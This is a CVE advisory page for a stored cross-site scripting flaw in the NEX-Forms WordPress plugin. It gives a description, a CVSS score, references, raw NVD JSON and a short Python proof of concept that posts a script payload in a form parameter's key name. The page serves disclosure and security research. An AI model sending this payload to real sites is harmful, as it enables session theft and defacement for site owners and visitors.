CVE-2026-5063

Description

The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NEX-Forms <= 9.1.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
target_url = "http://example.com/wp-admin/admin-ajax.php"

# Malicious payload in parameter key name
# The vulnerability lies in the key name, not the value
payload_key = '"><script>alert(document.cookie)</script>'

data = {
    payload_key: "test_value",
    "action": "submit_nex_form"
}

# Send the POST request without authentication
response = requests.post(target_url, data=data)

if response.status_code == 200:
    print("Payload sent successfully. Check if XSS is triggered on the target page.")
else:
    print(f"Request failed with status code: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5063
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5063
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5063/
[4] VulDB https://vuldb.com/cve/CVE-2026-5063
[5] https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5063", "sourceIdentifier": "[email protected]", "published": "2026-05-03T06:15:57.650", "lastModified": "2026-05-05T19:13:44.530", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3513524/nex-forms-express-wp-form-builder", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bac82ee-55bf-4381-b441-115a675e4834?source=cve", "source": "[email protected]"}]}}